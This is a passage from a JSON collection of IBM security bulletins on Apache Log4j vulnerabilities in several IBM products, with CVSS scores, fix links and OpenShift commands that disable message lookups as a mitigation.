notes](<https://www.ibm.com/docs/en/cloud-paks/cloudpak-data-system/1.0?topic=new-log4j-vulnerability-patch> \"release notes\" )** to apply above remediation. 
Please replace fpxxx in the release note with fp136.\n\n## Workarounds and Mitigations\n\n**Customers on ICPDS v1.0.0.0- 1.0.7.5 should apply the mitigation below**\n\n**Mitigation For OpenShift Container Platform 3.11 \n**\n\n**Note**: Below mitigation is needed and applicable if openshift-logging is enabled on system.\n\nTo determine if openshift-logging enabled, follow these steps:\n\n1) Login to control vm e1n1-1-control : ssh e1n1-1-control\n\n2) Run below command:\n \n \n oc get dc -n openshift-logging\n\n**Example**:\n\nWhen openshift-logging is enabled:\n \n \n $ oc get dc -n openshift-logging\n NAME REVISION DESIRED CURRENT TRIGGERED BY\n logging-es-data-master-76ovaz98 2 1 1\n logging-kibana 1 1 1 config \n \n \n\nWhen openshift-logging is NOT enabled:\n \n \n $ oc get dc -n openshift-logging\n No resources found.\n \n \n \n\n**Follow the below steps to mitigate the reported CVE-2021-45046 for Openshift Container Platform 3.11 \n**\n\n1) Login to control vm e1n1-1-control : ssh e1n1-1-control\n\nRun below commands as apadmin user:\n\n2) Change to project where Logging stack deployed (by default \"openshift-logging\" project)\n \n \n $ oc project openshift-logging\n \n\n3) Find the 'elasticsearch' `deploymentConfigs` deployed for passing later to `oc set env` command\n \n \n $ oc get dc -l component=es\n \n NAME REVISION DESIRED CURRENT TRIGGERED BY\n logging-es-data-master-kfity61t 9 1 1 \n logging-es-data-master-o68rc18y 4 1 1 \n logging-es-data-master-u6hh29n4 3 1 1 \n \n\n4) Set environment variable 'ES_JAVA_OPTS' in 'elasticsearch' for system property `log4j2.formatMsgNoLookups` to true\n \n \n $ oc set env -c elasticsearch dc/<elasticsearch_deploymentConfig_name> ES_JAVA_OPTS=\"-Dlog4j2.formatMsgNoLookups=true\"\n \n\nNote: \nPlease check if there are already some custom environment variables set for `ES_JAVA_OPTS` and append them if needed.\n\n5) Confirm before rolling out the variable is present:\n \n \n $ oc set env -c elasticsearch dc -l 
component=es --list | grep ES_JAVA_OPTS\n \n\n6) Rollout new `replicationControllers` for 'pods' to start with the new values:. Do this for all `deploymentConfigs`:\n \n \n $ oc rollout latest dc/<deploymentConfig_name>\n \n\n7) Check new ES pod has been spawned automatically after the rollout:\n \n \n $ oc get pods -l component=es\n \n NAME READY STATUS RESTARTS AGE\n elasticsearch-cdm-ba9c6evk-1-796f6cfdbc-4dqc6 2/2 Running 0 27m\n elasticsearch-cdm-ba9c6evk-2-7959d4d857-z5km9 2/2 Running 0 2d9h\n elasticsearch-cdm-ba9c6evk-3-5f9c5d668c-cr8lj 2/2 Running 0 2d9h\n \n\n8) Open a shell into the newly-spawned 'ES pods' to check Java command-line arguments passed correctly including \"-Dlog4j2.formatMsgNoLookups=true\"\n \n \n $ for es_pod in $(oc get pods -l component=es --no-headers -o jsonpath='{range .items[?(@.status.phase==\"Running\")]}{.metadata.name}{\"\\n\"}{end}'); \\\n do echo \"Confirm changes on $es_pod\" ; sleep 1 ; \\\n oc rsh -Tc elasticsearch $es_pod ps auxwww | grep log4j2.formatMsgNoLookups ; sleep 3; \\\n done\n \n\n`-Dlog4j2.formatMsgNoLookups=true` should be visible in above output\n\n9) The pods should also have this variable set:\n \n \n $ for es_pod in $(oc get pods -l component=es --no-headers -o jsonpath='{range .items[?(@.status.phase==\"Running\")]}{.metadata.name}{\"\\n\"}{end}'); \\\n do echo \"Confirm changes on $es_pod\" ; sleep 1 ; \\\n oc rsh -Tc elasticsearch $es_pod printenv | grep ES_JAVA_OPTS ; sleep 3; \\\n done\n \n\nYou should see something like:\n\nES_JAVA_OPTS=\"-Dlog4j2.formatMsgNoLookups=true\" \nES_JAVA_OPTS=\"-Dlog4j2.formatMsgNoLookups=true\" \nES_JAVA_OPTS=\"-Dlog4j2.formatMsgNoLookups=true\"\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) 
\n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nRedhat CVE page for CVE-2021-45046\n\n<https://access.redhat.com/security/cve/CVE-2021-45046>\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n20 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS5FPD\",\"label\":\"IBM Cloud Private for Data System\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"IBM Cloud Private for Data System 1.0 - All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T06:33:28", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Data System 1.0 is vulnerable to arbitrary code execution due to Apache Log4j ( CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-27T06:33:28", "id": "5C78D16785206BA3DE0656E1DA67E30BC720F22BB98882FCD6029110F7F105E2", "href": "https://www.ibm.com/support/pages/node/6551364", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2022-01-05T01:50:23", "description": "## Summary\n\nApache Log4j is used by IBM Sterling Partner Engagement Manager for generating logs in all components and tools. This bulletin provides remediation for the reported vulnerability by upgrading Log4j jars to 2.16.0 in IBM Sterling Partner Engagement Manager.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Partner Engagement Manager Standard and Essentials| 6.1.2.3.2 / 6.2.0.1.1 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability by applying the appropriate fix image.**\n\n**Refer to the applicable links below for update and install instructions.**\n\nIBM Sterling Partner Engagement Manager Standard 6.1.2.3.3\n\n * [http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&fixids=IBM_PEM_Standard_6.1.2.3.3&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&fixids=IBM_PEM_Standard_6.1.2.3.3&source=SAR>)\n\nIBM Sterling Partner Engagement Manager Essentials 6.1.2.3.3\n\n * [http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&fixids=IBM_PEM_Essentials_6.1.2.3.3&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&fixids=IBM_PEM_Essentials_6.1.2.3.3&source=SAR>)\n\nIBM Sterling Partner Engagement Manager Standard 6.2.0.1.2\n\n * [http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&fixids=IBM_PEM_Standard_6.2.0.1.2&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&fixids=IBM_PEM_Standard_6.2.0.1.2&source=SAR>)\n\nIBM Sterling Partner Engagement Manager Essentials 6.2.0.1.2\n\n * 
[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&fixids=IBM_PEM_Essentials_6.2.0.1.2&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&fixids=IBM_PEM_Essentials_6.2.0.1.2&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSKPRS\",\"label\":\"Partner Engagement Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.2.0.1.3, 6.1.2.3.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T06:41:44", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability (CVE-2021-45046) affects IBM Sterling Partner Engagement Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-22T06:41:44", "id": "1CF787D3495FD84D3FB0E74685765A4270075CE576D888A960036582B4F83133", "href": "https://www.ibm.com/support/pages/node/6536624", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-11T13:44:21", "description": "## Summary\n\nIBM WebSphere 
Application Server (WAS) is used by the IBM Rational ClearQuest server and web components. Information about security vulnerabilities affecting WAS have been published in a security bulletin. \n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n**Affected Product** | **Version(s)** \n---|--- \nIBM Rational ClearQuest | 8.0.0 \nIBM Rational ClearQuest | 8.0.1 \nIBM Rational ClearQuest | 9.0 \nIBM Rational ClearQuest | 9.0.1 \nIBM Rational ClearQuest | 9.0.2 \nIBM Rational ClearQuest | 9.1 \n \n## Remediation/Fixes\n\nRefer to the following security bulletin(s) for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS), which is used by IBM Rational ClearQuest. \n\n**Principal Product and Version(s)** | **Affected Supporting Product and Version** | **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearQuest, versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x, 9.0.2.x, 9.1.0.x | IBM WebSphere Application Server versions 7.0, 8.0, 8.5 and 9.0. 
| \n\n[Security Bulletin: WebSphere Application Server is vulnerable to a Denial of Service (CVE-2021-38951)](<https://www.ibm.com/support/pages/node/6524674> \"Security Bulletin: WebSphere Application Server is vulnerable to a Denial of Service \\(CVE-2021-38951\\)\" )\n\n[Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) \n \n**ClearQuest Versions**\n\n| \n\n**Applying the fix** \n \n---|--- \n8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x, 9.0.2.x, 9.1.0.x | Apply the appropriate IBM WebSphere Application Server fix (see bulletin link above) directly to your CM server host. No ClearQuest-specific steps are necessary. \n \n_For 8.0.x, 8.0.1.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSH5A\",\"label\":\"Rational ClearQuest\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"8.0.0, 8.0.1, 9.0.0, 9.0.1, 9.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T20:51:36", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities have been identified in IBM WebSphere Application Server used by IBM Rational ClearQuest", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38951", "CVE-2021-4104", "CVE-2021-45046"], "modified": "2021-12-21T20:51:36", "id": "08C5ED1F3E47E1FABE2752DAE40446E385D6C5EB30C70D7C739509CE04B06788", "href": "https://www.ibm.com/support/pages/node/6528968", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nIBM Cognos Controller is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Controller as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-45046) vulnerability. IBM Cognos Controller has upgraded Apache Log4j to v2.16. Please note that this update also addresses CVE-2021-44228.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Controller 10.4.2\n\nPlease note clients using IBM Cognos Analytics in combination with all versions of IBM Cognos Controller should reference [Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-45046) ](<https://www.ibm.com/support/pages/node/6528388> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability \\(CVE-2021-45046\\)\" )for important updates regarding IBM Cognos Analytics. \n\n## Remediation/Fixes\n\nIf you have the listed affected version, it is strongly recommended that you apply the most recent security update:\n\n[Download IBM Cognos Controller 10.4.2 IF16 from Fix Central](<https://www.ibm.com/support/pages/node/6528424> \"Download IBM Cognos Controller 10.4.2 IF16 from Fix Central\" )\n\nPlease note that this update also addresses CVE-2021-44228.\n\nRemediation for IBM Cognos Controller on Cloud has completed. \n\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Controller team developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers. \n\nTo get the patch and detailed instructions, click this link: [IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around](<https://www-945.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Cognos+8+Controller&release=All&platform=All&function=fixId&fixids=10.4.2.0-BA-CNTRL-Win64-LOG4J-WORK-AROUND:0&includeSupersedes=0&source=fc&login=true> \"IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around\" )\n\nThe patch is applicable to IBM Cognos Controller version 10.4.2. \n\nThe instructions will guide you to replace the log4j vulnerable files manually without impacting your current product version. \n\nPlease note that this mitigation also addresses CVE-2021-45105. 
\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n21 Dec 2021: \nAdded no-upgrade option to Workarounds and Mitigations; added note for clients using IBM Cognos Analytics to Affected Products and Versions; added IBM Cognos Controller on Cloud remediation completion to Remediation/Fixes \n21 Dec 2021: \nFixed typo in Summary \n20 Dec 2021: \nInitial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9S6B\",\"label\":\"Cognos Controller\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"10.4.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T02:58:49", "type": "ibm", "title": "Security Bulletin: IBM Cognos Controller 10.4.2 IF16: Apache Log4j vulnerability (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-22T02:58:49", "id": "5A77C3590D23BFD85FBC46CAC465870596841D78EFCD8AD2320EF501E87B107A", "href": "https://www.ibm.com/support/pages/node/6528580", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nApache Log4j is used by IBM 
i2 Analyze for general purpose and application error logging. It is also used in IBM i2 Analyst's Notebook Premium when the chart store is deployed. This bulletin addresses the vulnerabilities for the reported CVE-2021-45105 and CVE-2021-45046. The fix packages listed below include Log4j 2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and achieve remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Software**| **Version**| **Notes** \n---|---|--- \ni2 Analyze| 4.3.5.0| bundled with Enterprise Insight Analysis (EIA) 2.4.1.0 \ni2 Analyze| 4.3.4.0| bundled with EIA 2.4.0.0 \ni2 Analyze| 4.3.3.0| bundled with EIA 2.3.4.0 \ni2 Connect| 1.1.1| shipped with i2 Analyze 4.3.5.0 \ni2 Connect| 1.1.0| shipped with i2 Analyze 4.3.4.0 \ni2 Connect| 1.0.3| shipped with i2 Analyze 4.3.3.0 \ni2 Analyst's Notebook Premium| 9.3.1| Chart store component \ni2 Analyst's Notebook Premium| 9.3.0| Chart Store component \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.2.0 \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.3.0 \ni2 Connect| 1.0.2| shipped with i2 Analyze 4.3.2.0 \n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading using the links shown below.**\n\n**NOTE: THESE FIXPACKS SUPERSEDE THE PREVIOUS FIXPACKS MENTIONED IN <https://www.ibm.com/support/pages/node/6526220>**\n\n**Software**| **Version**| **Notes**| **Fix pack links** \n---|---|---|--- \ni2 Analyze| 4.3.5.0| bundled with EIA 
